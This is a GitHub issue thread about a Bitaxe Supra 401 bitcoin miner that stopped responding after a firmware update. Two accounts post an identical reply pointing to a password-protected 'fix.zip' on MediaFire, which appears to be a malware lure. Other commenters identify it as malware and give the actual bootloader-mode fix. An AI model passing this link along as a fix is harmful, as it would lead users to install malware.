skot/bitaxe #182: Bitaxe Supra 401 unresponsive after attempting upgrade via the OS

kinsaledunny, 2024-08-26:
Hi everyone,

I hope its ok to piggyback on this thread. I recently purchased a bitaxe Supra 401. I set it up and it was hashing away for me. I went to update the firmware and the device seems to have bricked on me. The screen has gone blank, I can boot it up and the fan spins but I'm unable to connect to it. I have tried to re-flash from https://wantclue.github.io/bitaxe-web-flasher/ on my COM1 & COM3 ports
but I keep getting the following message "Failed to initialize. Try resetting your device or holding the BOOT button while clicking INSTALL." I have pressed the reset button while pressing install but the fan stopped and the install failed, I have also tried to press the boot button while pressing install but nothing happens.
[image]
[image]

I have also tried to flash from https://flasher.bitronics.store/ and I'm getting the following error message "Starting flash process...
Error connecting to chip: Error: Failed to connect with the device
Fetching: assets/bitaxe_1.0.0/bootloader.bin
Failed to fetch or process file bootloader.bin: Error: HTTP error! status: 404 for file bootloader.bin"
[image]

Any help would be greatly appreciated. Thanks in advance guys.

xiaobai-marker, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

2302114245, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

kinsaledunny, 2024-08-26:
Hi guys, thanks for getting back to me so quickly. I have downloaded fix.zip but I'm getting the following error when trying to extract the file 
[image]

2302114245, 2024-08-26:
> 嗨，伙计们，感谢您这么快回复我。我已下载fix.zip但在尝试提取文件时收到以下错误 ![图像](https://private-user-images.githubusercontent.com/179467925/361434865-2766f6cf-44ab-4eca-8544-8668ce60728b.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2NzczOTksIm5iZiI6MTcyNDY3NzA5OSwicGF0aCI6Ii8xNzk0Njc5MjUvMzYxNDM0ODY1LTI3NjZmNmNmLTQ0YWItNGVjYS04NTQ0LTg2NjhjZTYwNzI4Yi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgyNlQxMjU4MTlaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1kZmI3ZDIzYjQ2ZWM1ZGU3ODVkOTZjOTk1OGY3ZjU0ZTEwMDc0MmQ3YWI0MjBjY2MzZDBhMTE3YWQyYTRhM2RiJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.-bRJmQZytHhSoIWJSDh0RPpeQ7xK9yWEZ_pRHU5Fb4U)

Not deleting it, it's a number-stealing virus I sought help in other communities leading me to download this!

19201003080114, 2024-08-26:
This is simply because you didn’t put device in bootloader mode before flashing. 
Why would you randomly download files from unknown source and run it? 
You don’t need to download any files to fix this simple issue. 
Check your computer now for virus and malware.

benjamin-wilson, 2024-08-26:
> Hi guys, thanks for getting back to me so quickly. I have downloaded fix.zip but I'm getting the following error when trying to extract the file [...]

This is some sort of virus/malware. Id suggest reinstalling your OS.

benjamin-wilson, 2024-08-26:
Please reach out to the seller for help. GitHub is for issues with the project and not individual support.

closed 2024-08-26 by benjamin-wilson